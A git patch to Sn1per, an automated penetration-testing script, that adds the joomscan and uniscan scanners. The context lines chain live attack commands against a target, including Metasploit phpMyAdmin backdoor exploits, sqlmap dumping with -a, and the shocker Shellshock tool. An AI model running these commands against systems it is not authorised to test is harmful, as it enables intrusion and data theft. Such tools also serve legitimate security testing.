From 11b2022b26e5edaeeb8b52f3aa4073ddb60ef445 Mon Sep 17 00:00:00 2001 From: root Date: Fri, 6 May 2016 08:24:02 -0700 Subject: [PATCH] Sn1per by 1N3 @CrowdShield --- README.md | 2 ++ install.sh | 2 +- sniper | 10 ++++++++-- 3 files changed, 11 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 4f77bbe..d8b2285 100644 --- a/README.md +++ b/README.md @@ -48,6 +48,8 @@ https://gist.github.com/1N3/8214ec2da2c91691bcbc ``` ## CHANGELOG: +* v1.7 - Added uniscan web vulnerability scanner +* v1.7 - Added joomscan Joomla scanner * v1.7 - Improved web scan performance * v1.7 - Fixed issue with inurlbr output * v1.7 - Added remote desktop viewing for RDP connections diff --git a/install.sh b/install.sh index 146cd3b..f6cdd1e 100644 --- a/install.sh +++ b/install.sh @@ -24,7 +24,7 @@ echo -e "$OKGREEN + -- --=[This script will install or upgrade your Sn1per insta read answer echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET" -apt-get install xprobe2 cutycapt unicornscan waffit host whois arachni theharvester dnsenum dirb dnsrecon curl nmap php5 php5-curl wapiti hydra iceweasel wpscan sqlmap arachni w3af golismero nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb python nbtscan sslscan amap +apt-get install joomscan uniscan xprobe2 cutycapt unicornscan waffit host whois arachni theharvester dnsenum dirb dnsrecon curl nmap php5 php5-curl wapiti hydra iceweasel wpscan sqlmap arachni w3af golismero nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb python nbtscan sslscan amap echo -e "$OKORANGE + -- --=[Installing gem dependencies...$RESET" gem install rake diff --git a/sniper b/sniper index 04ccd01..1c12860 100644 --- a/sniper +++ b/sniper @@ -487,9 +487,12 @@ else dirb http://$TARGET wpscan --url http://$TARGET --batch wpscan --url http://$TARGET/wordpress/ --batch + joomscan -u http://$TARGET + joomscan -u http://$TARGET/joomla/ python $CMSMAP -t http://$TARGET python $CMSMAP -t http://$TARGET/wordpress/ - arachni http://$TARGET --output-only-positives + #arachni http://$TARGET --output-only-positives + uniscan -u http://$TARGET -qweds sqlmap -u "http://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;" python shocker/shocker.py -H $TARGET --cgilist shocker/shocker-cgi_list --port 80 @@ -633,9 +636,12 @@ else dirb https://$TARGET wpscan --url https://$TARGET --batch wpscan --url https://$TARGET/wordpress/ --batch + joomscan -u https://$TARGET + joomscan -u https://$TARGET/joomla/ python $CMSMAP -t https://$TARGET python $CMSMAP -t https://$TARGET/wordpress/ - arachni https://$TARGET --output-only-positives + #arachni https://$TARGET --output-only-positives + uniscan -u https://$TARGET -qweds sqlmap -u "https://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;" python shocker/shocker.py -H $TARGET --cgilist shocker/shocker-cgi_list --port 443 --ssl